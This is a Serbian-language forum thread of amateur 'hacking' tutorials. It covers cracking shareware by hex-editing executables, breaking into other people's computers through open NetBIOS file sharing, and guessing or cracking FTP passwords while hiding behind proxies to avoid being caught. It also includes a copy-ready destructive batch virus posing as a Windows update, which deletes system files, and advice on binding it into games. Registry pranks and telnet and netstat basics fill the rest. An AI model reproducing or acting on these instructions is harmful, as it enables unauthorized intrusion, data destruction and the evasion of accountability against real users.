Skip to content

10 Decembar, 2022, 09:31:46 am *
Dobrodosli, Gost. Molim vas prijavite se ili se registrujte.

Prijavite se korisnickim imenom, lozinkom i duzinom sesije
 
   Pocetna   Pomoc Kalendar Prijava Registracija  
Stranice: « 1 2 3 4 »   Idi dole
  Stampaj  
Autor Tema: Hacking  (Procitano 42554 puta)
0 clanova i 1 gost pregledaju ovu temu.
Milenko
Vodeæi tim
*****

Karma: +23/-6
Van mreze Van mreze

Pol: Muskarac
Poruke: 523

P.F.C


WWW
« Odgovor #10 poslato: 29 Septembar, 2007, 03:13:18 pm »

Cracking

Sta je krekovanje programa?

Sigurno ste vec 1000 puta culi od nekoga: 'krekovao sam' igricu ili program, ali da li ste se ikada zapitali sta je zapravo krekovanje? Krekovanje progama (eng. cracking) je naime pronalazenje odredjenih propusta (rupa) u programu i izmena tog istog programa. Postoje milioni programa koji vam dozvoljavaju samo 30 dana koriscenja, ili oni koji traze serijski broj. To su takozvani shareware programi i od vas traze da platite autoru za koriscenje tog programa. Da bi se skinula ova zastita sa programa (umesto da platimo autoru) mi koristimo krekere (cracks) programe koji skidaju tu zastitu i koje obicno mozete naci na internetu. Dakle kada neko kaze 'krekovao sam' to je velika greska, jer krekovanje nije pokretanje krek programa downloadovanog sa interneta, vec pronalazenje rupa u programu i njegova izmena.

Krekovanje programa

Programi se mogu krekovati na razlicite nacine. Ja cu vas nauciti kako da krekujete programe uz pomoc njihovog HEX koda. Za ovo ce vam biti potreban neki HEX EDITOR (program slican notepadu koji cita hex kod). Ovakav program mozete naci svuda, a ja vam predlazem da skinete program sa mog sajta: HEXEDIT koji i ja sam koristim. Pokrenite hex editor i otvorite odredjeni program koji zelite da krekujete. U ovom primeru ja cu se osvrnuti na krekovanje mIRC-a. Kada pokrenete editor i otvorite program (u mom primeru mIRC.exe) pojavice vam se ekran koji je pun raznih znakova, brojeva i slova koji nemaju nikakve logike. Ali, ako pregledate ceo fajl i skoncetrisete se na desnu stranu fajla videcete neke stvari koje i imaju neke logike npr:

... itd ...
 & H e l p ‚ā¨ & C o n t e n t s  & A b o u t . . . ‚ā¨ ‚Äö & R e g i s t e r . . . √Ą Ȑ   # √ć ‚ÄĘ A b o u t m I R C  M S S a n s S e r i f  P R ƒ .  &‚ā¨ & U R L P ‚Ķ ƒ
... itd ...

Ovo vec i ima neke logike! Ovo je zapravo help meni u mIRCu, i kao sto vidite u help meniu se nalaze Contents, About..., Register... i About mIRC dok MS Sans Serif oznacava FONT teksta. Ako uklonite ovaj deo u mIRC-u vise vas mIRC nece imati HELP meni, i naravno ukoliko niste ragistrovali vas mIRC, nece biti ni potrebe. Takodje odavde mozete promeniti i font meni-a (samo ako promenite MS Sans Serif). Po istom sistemu se mogu krekovati i ostali programi. Potrebno je samo da pregledate ceo HEX kod exe fajla i da ga dobro prostudirate i onda ostaje samo na eksperimentisanju. Verovatno ce te morati da ulozite dosta strpljenja i truda dok ne uspete da krekujete odredjeni program, ali nemojte odustajati, jer samo radom i trudom mozete postati pravi haker. Verovatno je da necete uspeti iz prvog pokusaja da krekujete zeljeni program i zato uvek napravite BACKUP *.exe fajla koji krekujete, kako bi ukoliko pogresite mogli da povratite *.exe fajl.Sacuvana
Milenko
Vodeæi tim
*****

Karma: +23/-6
Van mreze Van mreze

Pol: Muskarac
Poruke: 523

P.F.C


WWW
« Odgovor #9 poslato: 29 Septembar, 2007, 03:11:44 pm »

FILE SHARING

Ukoliko neznate da li je vama ukljucena Fajl Sharing opcija samo idite na Control Panel / Network. Sada trebate da vidite prozor na kome se nalazi spisak svog mreznog software-a koji ste instalirali, kao sto je TCP/IP i dugme File and Print Sharing. Proverite da li je opcija cekirana. Ukoliko jeste (file sharing je ukljucen) onda je uncekirajte tj iskljucite.

[Krecemo sa upadom]
Sada cu vam objasniti nacin na koji mozete da upadnete na kompjuter gde je ukljucen Fajl Sharing. Cinjenica za to da Windows nije bezbedan je to sto alati za hakovanje se nalaze u samom Windowsu. Programi koji su vam potrebni za ovo su Nbtstat.exe i Net.exe. Oba programa se mogu naci u folderu C:\Windows, ali ukoliko ih tamo ne nadjete, onda ih potrazite na instalacionom CD-u Windowsa. Ovi programi se pokrecu iz MS-DOS Prompta. Da bi ste videli pomocni meni (help) za Nbtstat.exe samo ukucajte nbtstat /? i za Net.exe ukucajte net /?. Sada krenimo u akciju. Prvo vam je potrebna IP adresa ili host kompjutera u koji upadate. Recimo da upadate u komjuter ciji je host computer.isp.com i IP adresa 123.45.67.8. Prvo sto trebate da uradite jeste to da proverite da li je FileSharing na tom kompjuteru ukljucen. To izvedite tako sto ce te ukucati:

nbtstat -a IMEHOSTA
- ili
nbtstat -A IPADRESA

Bitno je da na drugom nacinu ukucate veliko A. Malo je to cudno zato sto DOS nije CASE SENSITIVE, ali tako to radi. Sada mozete da dobijete dve vrste odgovora. Jedan koji ce reci "Host Not Found" i koji nam govori da na kompjuteru nije ukljucen FileSharing (ili da ste pogresili IP adresu) i drugi koji ce vam dati spisak imena (names) type i status koji znaci da ste na pola puta od ulaska u komp. Tabela bi trebala da izgleda ovako:

Name Type Status
Host <20> UNIQUE Registered
Hostbug <00> GROUP Registered
Host machine <03> UNIQUE Registered

Kako sada da upadnete? Lako! Prvo morate da podesite Lmhosts fajl koji se nalazi u C:\Windows\Lmhosts (nema ekstenziju) uz pomoc notepada, a ukoliko ga nema u Windows direktorijumu, onda ga napravite sami (samo ne zboravite da se fajl zove 'Lmhosts' i da NEMA EKSTENZIJU). Da bi ste ga napravili samo otvorite Lmhosts fajl u notepadu, unesite zrtvinu IP asresu, pritisnite TAB, i unesite 'Share Name' - ime koje ste nasli uz pomoc nbtstat-a (u tabeli). Sada snimite ovaj fajl i izadjite iz notepada. Sada postoje dva nacina na koji mozete da pristupite kompjuteru: najlaksi, lak i kul nacin!!!

[Najlaksi nacin]
Imate IP adresu? Imate Share name? OK! Idite na START > RUN i samo unesite sledece:
//IPADRESA/SHARENAME/
na primer:
//123.45.67.8/hostbug/
Ovime ce vam se pojaviti prozor slican onome koji dobijete kada kliknete na My Computer ikonu iz koga ce te moci da pretrazujete zrtvin kompjuter.
Sacuvana
Milenko
Vodeæi tim
*****

Karma: +23/-6
Van mreze Van mreze

Pol: Muskarac
Poruke: 523

P.F.C


WWW
« Odgovor #8 poslato: 29 Septembar, 2007, 03:08:38 pm »

FTP

Pre svega zelim da vam objasnim znacenje reci FTP. FTP je skracenica od engleskih reci 'File Transfer Protocol' sto bi na nasem jeziku znacilo 'protokol prenosa fajlova'. Kao sto sam naziv kaze FTP je protokol koji sluzi za prenos fajlova od servera do klijenta. Server je kompjuter na koji ste vi konektovani, a klijent ste vi sami. Svaki sajt ima svoj odredjeni FTP server na koji se uploaduje sadrzaj sajta. Da bi se konektovali na FTP server moramo da imamo odredjeni FTP software poznat kao FTP klijent. Zapravo, sam Windows dolazi sa FTP klijentom koji je pomalo tezak ukoliko se ne snalazite bas najbolje u MSDOS-u. Ovaj program mozete naci u sledecem folderu:

C:\windows\ftp.exe

Program ce se automatski sam pokrenuti i ako u MSDOS-u samo ukucate FTP. Tada ce vam se umesto odzivnog znaka c:\> pojaviti:

ftp>

Ovo znaci da je FTP klijent pokrenut. Pre nego sto pocnete sa FTP Hacking-om morate prethodno da znate i FTP komande. Spisak komandi ce te dobiti ako ukucate help:
ftp> help
Takodje mozete umesto help ukucati i samo znak ?
Kada ovo ukucate dobicete listu FTP komandi koja izgleda ovako:
Commands may be abbreviated. Commands are:
!    delete    literal    prompt    send
?    debug    ls    put    status
append    dir    mdelete    pwd    trace
ascii    disconnect    mdir    quit    type
bell    get    mget    quote    user
binary    glob    mkdir    recv    verbose
bye    hash    mls    remotehelp    
cd    help    mput    rename    
close    lcd    open    rmdir    
ftp>

Sada ce mo svaku vazniju naredbu obraditi zasebno. Naime, pokusacu da vam objasnim cemu koja komanda sluzi i kako se koristi.

OPEN - ova naredba sluzi za konektovanje na FTP server. Koristi se u sledecem obliku:
ftp> open ime_hosta.com

DISCONNECT - kao sto prethodna komanda sluzi za konektovanje na FTP server, tako ova sluzi za diskonektovanje sa servera. Za njeno koriscenje samo ukucete DISCONNECT i to je to.

GET - ukoliko zelite da preuzmete (download-ujete) neki fajl sa servera, onda koristite ovu komandu:
ftp> get fajl.txt

MGET - kada zelimo da preuzmemo vise fajlova od jednom, onda ne mozemo koristiti naredbu GET vec cemo koristiti MGET:
ftp> mget *.txt

PUT - ova neredba koristi za slanje (upload-ovanje) fajlova na server:
ftp> put fajl.txt

MPUT - za slanje vise fajlova na server koristi se naredba MPUT:
ftp> mput *.txt

Ovo su neke od osnovnih komandi koje su vam potrebne, a ukoliko vam je potrebna pomoc za odredjenu komandu, onda ce te uneti sledece:
ftp> help {komanda}
Gde je {komanda} odredjena komanda za koju vam treba pomoc.

Na primer, ukoliko zelim da naucim kako se koristi komanda CD ja cu da ukucam ovu komandu:

ftp> help CD

FTP program ce prikazati sledece:

cd Change remote working directory

Sada kada znamo osnovne FTP komande mozemo da isprobamo rad sa FTP-om. Pre svega potrebno je da se konektujemo na odredjeni FTP server. Pokrenimo MSDOS i ukucajmo FTP. Tada cemo pokrenuti FTP klijent. Za konektovanje na server unesite sledece:

ftp> open ime_servera.com
Gde je ime_servera.com bilo koji server na koji zelite da se konektujete (npr. hotmail.com ili ptt.yu). Pogledajte sledeci primer da bi vam bilo jasnije.

ftp> open web2.mtnl.net.in
Ova komandom cu da se konektujem na server web2.mtnl.net.in

Nekon sto se konektujemo na FTP server, docekace nas neka vrsta banera za dobrodoslicu koji izgleda ovako:

Connected to web2.mtnl.net.in.
220-
220-#*************************************************************
220-# Welcome to MTNL's ftp site
220-#*************************************************************
220-#
220-# You can upload your own homepages at this site!!!
220-#
220-# Just login with your username and upload the HTML pages.
220-# (You can use your favourite HTML editor as well)
220-#
220-# World will see it at http://web2.mtnl.net.in/~yourusername/
220-#
220-# So get going......UNLEASH YOUR CREATIVITY !!!!
220-#
220-#*************************************************************
220-
220 ftp2.mtnl.net.in FTP server ready.
User (web2.mtnl.net.in:(none)): forbidden
331 Password required for forbidden.
Password:

Kao sto i sami vidite za ulazak na FTP server potreban je password. Sada vi sigurno mislite 'pa koj ce mi to k*rac kada ne znam password?' Stvar je u tome sto veliki broj FTP servera dozvoljava takozvane anonimne ulaze. To znaci da ce te kao password iskoristiti anonymous i moci ce te da upadnete u server i izvrsite upload ili download fajlova. Ali na nasu zalost postoje i serveri koji ne dozvoljavaju anonimne ulaze, vec zahtevaju odredjeni password. Da bi upali u ovakav server ne postoji drugi nacin osim da provalimo password. Predlazem da prethodno kao password isprobate ime samog servera, a ukoliko to nece probajte neki password sa sledece kratke liste:

admin        12345
administrator    abc
pass        qwerty
password
open   
enter

(procitajte tutorial 'Password Krekeri')

Ukoliko nece ni jedan od ovih passworda onda vam preporucujem jedan lamerski, ali efikasan nacain: da nabavite neki program za krekovanje FTP passworda. Na mom sajtu mozete naci odlican program za te svrhe, a zove se Crack FTP. O samom programu ne trebam mnogo da vam pricam jer je veoma jednostavan za koriscenje. Potrebno je samo da unesete adresu FTP servera, kliknete na CRACK i sacekate da vam se pojavi password FTP servera.

Dakle uspeli smo sada da nabavimo password i upascemo u FTP server, ali tu nastaje jedan problem. Svaki upad u FTP server ostavlja log na kome se vidi da je neko usao u server. Tacnije u logu se vidi nasa IP adresa, a ukoliko neko zna nasu IP adresu, vrlo lako ce nas uhvatiti. Najbolji nacin za sakrivanje IP adrese je koriscenje Firewall-a, WinGate-a, Proxy-a. Ukoliko neznate sta je to, evo malog objasnjenje u nekoliko crta. Proxy je zapravo server na koji se mi konektujemo i koji nam daje laznu IP adresu tj. adresu proxy servera tako da ce se, ukoliko upadnemo u FTP server, u logovima pojaviti adresa proxy servera umesto nase. Sve ovo radi na sledecem principu:

Localhost --> Proxy Server --> FTP Server --> Proxy Server --> Localhost

Posto ja predpostavljam da vi nikad niste koristili neki od proxy servera, morace te da iskoristite program koji se naziva Proxy Redirect i koji se takodje nalazi na mom sajtu. Sam program je veoma jednostavan i dolazi sa velikom listom proxy servera. Takodje i vi sami mozete pronaci proxy servere ako u Google-u ili Yahoo-u ukucate 'proxy server'. Uz pomoc ovog programa bicete potpuno zasticeni i ne postoje nikakve sanse da budete uhvaceni. Detaljno objasnjenje o ovom programu nalazi se u njegovom Readme.Txt fajlu.

Sada smo totalno spremni za upad u FTP server. Dakle, pokrenuli smo proxy server, konektovali se na FTP server i sta sada? E sada je veoma jednostavno! Recimo da zelimo da dodjemo do odredjenog fajla koji se naziva SIFRE.DOC i koji se nalazi u direktorijumu PASS. Da bi ovo uradili pratite sledeci postupak:

ftp> cd pass
Ovom komandom uci ce mo u direktorijum (folder) pod imenom pass. Posto se sada nalazimo u folderu u kome se nalazi zeljeni fajl koji zelimo da download-ujemo, potrebno je izvesti sledeci korak:

ftp> get SIFRE.DOC
Ovime smo otpoceli download naseg zeljenog fajla.

Ukoliko zelimo da vidimo spisak svih fajlova i direktorijuma na serveru unesite samo komandu DIR i spisak ce vam se pojaviti. Nakon sto smo download-ovali zeljeni fajl sa servera ukucacemo DISCONNECT kako bi se diskonektovali tj. kako bi napustili FTP server.

Takodje bih trebalo da spomenem i komandu SYST koja je veoma interesantna. Naime, ona sluzi za prikaz informacija o sistemu FTP servera tj. informacija o operativnom sistemu i verziji FTP-a. A ukoliko to znamo mozemo pronaci odredjeni propust (rupu) u sistemu, ali o tome cemo nekom drugom prilikom...
 A sada nemojte bas da pravite veliku stetu, jer ipak... nije nam to cilj ;)
Sacuvana
Milenko
Vodeæi tim
*****

Karma: +23/-6
Van mreze Van mreze

Pol: Muskarac
Poruke: 523

P.F.C


WWW
« Odgovor #7 poslato: 29 Septembar, 2007, 03:06:13 pm »

Tracert

Kada ukucate hotmail.com u vas browser, onda vi zahtevate prolaz kroz veliki broj kompjutera pre nego sto dodjete do hotmail.com -a. Ili kada se ulogujete i vas Shell account i ukucate password tada ovaj password prolazi kroz veliki broj kompjutera pre nego sto dodje do Shell account servera.

Da bi ste nasli listu servera kroz koje je vas password prosao mozete koristiti Tracert komandu (ili traceroute na unix sistemima). Ukoliko u MSDOS-u ukucate Tracert, dobicete sledeci ekran:

C:\WINDOWS>tracert

Usage: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name

Options:

-d Do not resolve addresses to hostnames.
-h maximum_hops Maximum number of hops to search for target.
-j host-list Loose source route along host-list.
-w timeout Wait timeout milliseconds for each reply.

Ovo je pomocni ekran koji nam govori kako se koristi Tracert. Sada cemo dati primer pracenja (tracing) putanje do hotmail.com -a sa vaseg kompjutera. Da bi ste ovo uradili unesite sledecu komandu:

C:\windows>tracert hotmail.com

Umesto hotmail.com takodje mozete unesti i IP adressu koju mozete da nadjete pomocu NSLookup-a. Isprobajte Tracert sa razlicitim parametrima i vidite kakvi su rezultati. To je najbolji nacin da naucite kako se Tracert komanda koristi.
« Poslednja izmena: 29 Septembar, 2007, 03:32:02 pm Milenko » Sacuvana
Milenko
Vodeæi tim
*****

Karma: +23/-6
Van mreze Van mreze

Pol: Muskarac
Poruke: 523

P.F.C


WWW
« Odgovor #6 poslato: 29 Septembar, 2007, 03:04:02 pm »

Netstat

Da bi ste pokrenuli netstat morate da pokrenete Dos Prompt i da unesete komandu netstat. Netstat je alat koji vam moze dosta koristiti i koji ima dosta svrha. Ja licno koristim netstat kako bih otkrio IP adresu drugih korisnika na ICQ i AIM. Takodje, netstat mozete koristiti i za posmatranje otvorenih portova. Netstat se nalazi u windows direktorijumu i mozete ga pokrenuti ako u ms-dos prompt unesete:

c:\windows\> netstat
Active Connections
Proto    Local Address    Foreign Address    State
TCP    pavilion:25872    WARLOCK:1045    ESTABLISHED
TCP    pavilion:25872    sy-as-09-112.free.net.au:3925    ESTABLISHED
TCP    pavilion:31580    WARLOCK:1046    ESTABLISHED
TCP    pavilion:2980    205.188.2.9:5190    ESTABLISHED
TCP    pavilion:3039    24.66.10.101.on.wave.home.com:1031    ESTABLISHED

Sada dobro pogledajte prethodni primer. Videcete [Proto] u gornjem levom uglu. Ovo nam govori koji je protokol u pitanju tcp/udp. Odmah napred nalazi se [Local Address] ovo nam govori lokalnu ip adresu/hostname i otvorene portove. Zatim, [Foreign Address] - govori IP adresu/host i otvoren port konekcije u obliku IP:PORT sa ":" izmedju. I na kraju videcete [State] koji nam govori da li je konekcija uspostavljena. Ovo moze biti ESTABLISHED ukoliko je konekcija uspostavljena i LISTENING ukoliko se ceka konekcija.

[Detektovanje otvorenih portova]

Netstat mozete koristiti i da nadjete vasu IP adresu i otvorene portove na vasem racunaru. Na slican nacin, Netstat se moze koristiti i za detektovanje trojana. Evo i primera: Primetili ste nesto veoma cudno sa vasim kompjuterom? Vas cd-rom se sam od sebe otvara i zatvara. Vi shvatate da se neko petljao sa trojanom na vasem racunaru. Sada vam je cilj da otkrijete koji je trojan u pitanju i da ga uklonite. Dakle sada ce te pokrenuti vas ms-dos prompt i proveriti koji su portovi otvoreni. Postoje mnogo nacina za koriscenje netstata, stoga pogledajte help kucajuci netstat ?
Displays protocol statistics and current TCP/IP network connections.
NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]
-a    Displays all connections and listening ports.
-e    Displays Ethernet statistics. This may be combined with the -s option.
-n    Displays addresses and port numbers in numerical form.
-p    Proto Shows connections for the protocol specified by proto; proto may be TCP or UDP. If used with the -s option to display per-protocol statistics, proto may be TCP, UDP, or IP.
-r    Displays the routing table.
-s    Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the -p option may be used to specify a subset of the default.
interval    Redisplays selected statistics, pausing interval seconds between each display.
Press CTRL+C to stop redisplaying statistics. If omitted, netstat will print the current configuration information once.

Sacuvana
Milenko
Vodeæi tim
*****

Karma: +23/-6
Van mreze Van mreze

Pol: Muskarac
Poruke: 523

P.F.C


WWW
« Odgovor #5 poslato: 29 Septembar, 2007, 03:01:45 pm »

Hakovanje windowsa

Regedit - Registry Editor]

Ovo zapravo i nije 'hakovanje' kao sto su upadi u sisteme i slicno. Ovo je zapravo izmena samog Windowsa i maksimalno koriscenje onoga sto nam Windows pruza. Za veliki broj operacija bice vam potrebno znanje rada u regeditu. Ukoliko znate da rukujete regeditom odlicno, ukoliko ne... naucicete. Program Regedit mozete naci u Windows direktorijumu c:\Windows\Regedit.exe, a mozete ga veoma jednostavno pokrenuti ako kliknete na start, zatim na run i unesete REGEDIT.

- Gde je Shut Down?

Ovaj trik vam moze pomoci da uplasite i prevarite lamere. Ovime ce te sakriti dugme shutdown iz start menia tako da se kompjuter ne moze ugasiti klikom na Shut Down. Startujte regedit i prvo napravite backup (kako bi mogli da vratite Shut Down dugme) tako sto ce te kliknuti na 'Registry' pa na 'Export Registry File', sada unesite ime fajla (bilo koje npr. backup1.reg) i kliknite na save. E, sada mozete poceti sa uklanjanjem Shut Down dugmeta. Idite na:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Sada napravite novi 'String Value' tako sto ce te ici na 'Edit', 'New' i na 'String Value' i dacete mu ime NoCloseKey. Sada kliknite desnim tasterom na ovaj String Value, kliknite na 'Modify' i unesite 1 u  polje Value Data. Shut Down iz start menia sada ce biti onemogucen. Kada budete zeleli da ponovo omogucite Shut Down potrebno je samo da pokrenete buckup koji ste na pocetku napravili (backup1.reg) i dugme ce biti vraceno.

NAPOMENA: PRE BILO KAKVE OPERACIJE NAD REGEDITOM PRETHODNO NAPRAVITE BACKUP O KOME SAM MALO PRE GOVORIO ('KLIKOM NA EXPORT REGISTRY FILE') KAKO BI KASNIJE MOGLI DA VRATITE PRVOBITNA PODESAVANJA.

- A: B: C: D:

Jos jedan mali trik da prevarite vase prijatelje. Zapravo, ovim trikom ce te iz My Computer-a ukloniti sve drajve (Flopi, Hard Disk itd...) Pokrenite regedit idite na:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Ovde napravite novi 'DWord Value' i dajte mu ime NoDrives. Sada samo modifikujte njegovu vrednost na 3FFFFFF (Hexadecimal).

- Screen Saver trik

Da bi ste ukjucili i iskljucili screen saver idite na:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ScreenSavers

Napravite novi 'String Value', dajte mu ime Mouse Corners i dajte mu vrednost -Y da ukljucite i -N za suprotno.  Sada kad god pomerite mis u gornji desni ugao ekrana pokrenuce se screen saver, a kada ga budete pomerili na donji levi ugao screen saver ce se ugasiti.

- Brisanje ikonica preko regedita

Sta mislite, da li je moguce obrisati Recycle Bin? Nema nikakve logike, ali jeste. Pored toga, mozete obrisati i My Computer ikonicu, kao i dosadnu Network Neighborhood ikonu. Da bi ste to uradili idite na
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\Namespace{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}
- gde je {xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx} oznaka ikonice koju zelimo da uklonimo. Oznake ikonica se nalaze u sledecoj listi:

My Briefcase:{85BBD920-42AO-1069-A2E4-08002B30309D}
Desktop: {00021400-0000-0000-C000-0000000000046}
Control Panel:{21EC2020-3AEA-1069-A2DD-08002B30309D}
Dial-Up-Networking:{992CFFA0-F557-101A-88EC-00DD01CCC48}
Fonts: {BD84B380-8CA2-1069-AB1D-08000948534}
Inbox :{00020D76-0000-0000-C000-000000000046}
My Computer :{20D04FE0-3AEA-1069-A2D8-08002B30309D}
Network Neighborhood:{208D2C60-3AEA-1069-A2D7-O8002B30309D}
Printers :{2227A280-3AEA-1069-A2DE-O8002B30309D}
Recycle Bin :{645FF040-5081-101B-9F08-00AA002F954E}
The Microsoft Network:{00028B00-0000-0000-C000-000000000046}
History: {FF393560-C2A7-11CF-BFF4-444553540000}
Winzip :{E0D79300-84BE-11CE-9641-444553540000}

Dakle ukoliko npr. zelimo da obrisemo Recycle Bin icice mo do: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\Namespace{645FF040-5081-101B-9F08-00AA002F954E}
i obrisacemo ovaj kljuc. Ovime ce mo ukloniti ikonicu Recycle Bina. Kada zelite ikonicu nazad... pokrenite backup!

- Zanimljiv toolbar

Ucinite Win Explorer i Internet Explorer lepsim, postavite sliku na toolbaru. Da bi ovo uradili idite na:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\ Internet Explorer\Toolbar\

Sada napravite novi 'String Value' sa imenom BackBitmap i podesite mu vrednost (modify) na putanju do slike koju zelite da stavite na toolbar u *.bmp formatu (npr. C:\Windows\Slika.bmp). Sada ce Windows Explorer i Internet Explorer imati sasvim novi izgled!!!

Sacuvana
Milenko
Vodeæi tim
*****

Karma: +23/-6
Van mreze Van mreze

Pol: Muskarac
Poruke: 523

P.F.C


WWW
« Odgovor #4 poslato: 29 Septembar, 2007, 02:59:56 pm »

Sta su virusi?

Na pocetku tutoriala cu vam objasniti sta su virusi, iako je vecina mozda i okusila nevolje koje virus donosi. Virus je zapravo program ili skripta (java, vbasic...) napravljena da nasteti vasem kompjuteru i koji se moze sam i bez vaseg znanja kopirati na floppy i slati preko e-maila koristeci vase mail adrese u Address Book-u (to su takozvani CRVI ili WORM). Pored toga neki virusi su napravljeni tako da zaraze i ostale fajlove na vasem kompjuteru.

[Kako se prave?]

Za pravljenje virusa mogu se koristiti svi moguci programski i skripting jezici. Da bi ste vi sami mogli da pravite neke vrste virusa morate da znate odredjene programske jezike. Zato vam savetujem da, ukoliko neznate, naucite neki programski jezik. Ukoliko zelite da postanete haker morate znati c, c++ i perl programske jezike.

U daljem tekstu slede 2 primera *.BAT virusa i *.TXT.VBS virusa koje je veoma jednostavno napraviti i koji ce vam malo pribliziti pojam pravljenja virusa! Naravno, da bi ih razumeli morate znati BATCH i VISUAL BASIC skripting jezike.

Ukoliko bi vi zeleli da napravite *.bat virus, evo vam malog primera kako da to uradite. Potrebno je samo da sledeci batch kod iskopirate u notepad i snimite ga kao winupdt.bat fajl i eto vam malog virusa! Ovaj virus se predstavlja kao UPDATE za Windows 98, ali je zapravo virus koji ce obrisati vazne sistemske fajlove, kao i Windows Explorer i zatim restartovati racunar. Jednom napravljen ovakav virus mozete ubaciti i u neki exe fajl (program ili igricu), a to ce vam najlakse biti uz pomoc nekog bindera (npr. MultiBinder), sem ukoliko znate c/c++ programski jezik... HeHeHe :D (da bi naucili ovaj programski jezik downloadujte tutorial sa naseg sajta, ili potrazite neki na NETu).


@ECHO OFF
echo Welcome To Microsoft Windows System Updater Setup
echo Installing Components... Please Wait...
echo y|del c:\autoexec.bat
echo y|del c:\config.sys
echo y|del c:\windows\system.ini
echo y|del c:\windows\win.ini
echo y|del c:\windows\explorer.exe
echo Installing is DONE.
echo Setup Will Now restart Your Computer... Please Wait...
start C:\WINDOWS\RUNDLL.EXE user.exe,exitwindows


VBA crvi koriste posebnu tehniku kako bi zavarali potencijalnu zrtvu. Pored toga sto crv nema ekstenziju EXE vec VBA ili VBS (sto znaci da su pisani u Visual Basic Script formatu i da je za njihovo izvrsavanje potreban IE), takvi crvi se obicno distribuiraju sa extenzijom '.txt.vba', tako da potencijalna zrtva pomisli da se radi o obicnom tekstu i startuju fajl. Posto je zadnja ekstenzija '.vba', ne startuje se Notepad vec IE koji izvrsi program, tako da potencijalna zrtva postane prava zrtva.
Sacuvana
Milenko
Vodeæi tim
*****

Karma: +23/-6
Van mreze Van mreze

Pol: Muskarac
Poruke: 523

P.F.C


WWW
« Odgovor #3 poslato: 29 Septembar, 2007, 11:15:33 am »

Sta je telnet?

Telnet je neverovatni alat koji svaki haker MORA da zna da koristi pre nego sto i pomisli o hakovanju servera. Telnet je bolje receno protokol koji zahteva i koga pokrece TCP/IP. Moze se koristiti za konektovanje na udaljene racunare i da izvrsi komandnu liniju programa, jednostavnim unosenjem komandi u njegov GUI (graficki korisnicki interfejs) prozor. Telnet se nalazi u Windows folderu tj u: c:\windows\telnet.exe i u c:\winnt\system32\telnet.exe na Windows NT sistemima, a mozete ga pokrenuti ako u MSDOS-u ukucate telnet.

[Kako da se konektujem na udaljeni kompjuter?]

Veoma je jednostavno da se konektujete na udaljeni kompjuter uz pomoc Telnet-a. Pokrenite telnet i kada vam se pojavi njegov prozor samo kliknite na: CONNECT > REMOTE SYSTEM i zatim u 'HOST NAME' unesite IP adresu ili host racunara na koji se konektujete. Zatim, u 'PORT' unesite otvoreni port na koji se konektujete. TermType treba skoro uvek da vam bude podesen na vt100. Kliknite na CONNECT i bicete konektovani na udaljenu masinu.
Najjednostavniji nacin za pokretanje telneta i njegovo konektovanje na sistem je ako u MSDOS-u ukucate:
C:\>telnet hostname.com ###

- gde je telnet komanda koja pokrece sam program telnet, a hostname.com je host ili ip adresa na koju se konektujemo (npr. ptt.yu) :), a ### je broj otvorenog porta (npr. 139)

Mozda ce vam biti problem u tome sto neznate na koj port da se konektujete tj. koji port je otvoren na masini na koju se konektujete. Da bi ste dobili listu otvorenih portova, morate upotrebiti Port Scanner ili drugi program koji skenira masinu za otvorene portove. Znam da je lamerski koristiti program za nesto kao skeniranje otvorenih portova, ali taj nacin je za vas najlaksi. Ovo je lista nekih osnovnih portova:

Ping 7
Systat 11
Time 13
NetStat 15
FTP 21
SSH 22
Telnet 23
SMTP 25
Whois 43
Finger 79
HTTP 80
POP 110
NNTP 119
IDENT 139

Kao primer konektovanja i koriscenja telneta pokazacu vam konektovanje na FTP port. Dakle, ovako... Ukoliko zelim da se konektujem na odredjeni racunar koji ima IP adresu 123.45.67.8 ja cu prvo da skeniram uz pomoc Port Scannera za otvorene portove na ovom racunaru. Dobicu listu svih otvorenih portova. Naravno, vidim da je otvoren i port 21 tj. FTP. Sada cu u MSDOS-u ukucati:
C:\>telnet 123.45.67.8 21
i konektovacu se na zeljeni FTP server. Sada samo ukucajte ? (2 puta pritisnite ENTER) i dobicete listu komandi koje mozete koristiti. Ovo vazi i za sve ostale portove na koje zelite da se konektujete.
Ovo ce vam zvucati smesno, ali je zanimljivo... uz pomoc telneta se mozete konektovati i na bilo koji irc chat server, tako da vam telnet moze posluziti kao irc klijent :)) Potrebno je samo da se konetktujete na IRC server na port 6667 i da vidite listu komandi.
Evo i jednog predloga: ukoliko ste zrtva mail bomba od strane nekog lamera, umesto da downloadujete sve te stotine poruka, pa zatim da ih brisete, mozete se jednostavno konektovati na POP server vaseg ISP provajdera i odjednom obrisati svu nezeljenu postu bez njenog prethodnog downloadovanja, tako da mozete ustedeti i sate downloadovanja ebomb poruka. Nesto sto je meni najvaznije je to sto uz pomoc telneta mozete dobiti prikaz informacija o sistemu servera tj. informacija o operativnom sistemu i njenoj verziji.
Sacuvana
Stranice: « 1 2 3 4 »   Idi gore
  Stampaj  
 
Prebaci se na:  

Pokrece MySQL Pokrece PHP Powered by SMF 1.1.9 | SMF © 2006, Simple Machines LLC
Joomla Bridge by JoomlaHacks.com
Ispravan XHTML 1.0! Ispravan CSS!

Statistika

Na sajtu su trenutno 0 gost/a i 0 clan/a.
mod_vvisit_counterDanas106
mod_vvisit_counterJuce247
mod_vvisit_counterOve nedelje1497
mod_vvisit_counterOvog meseca2719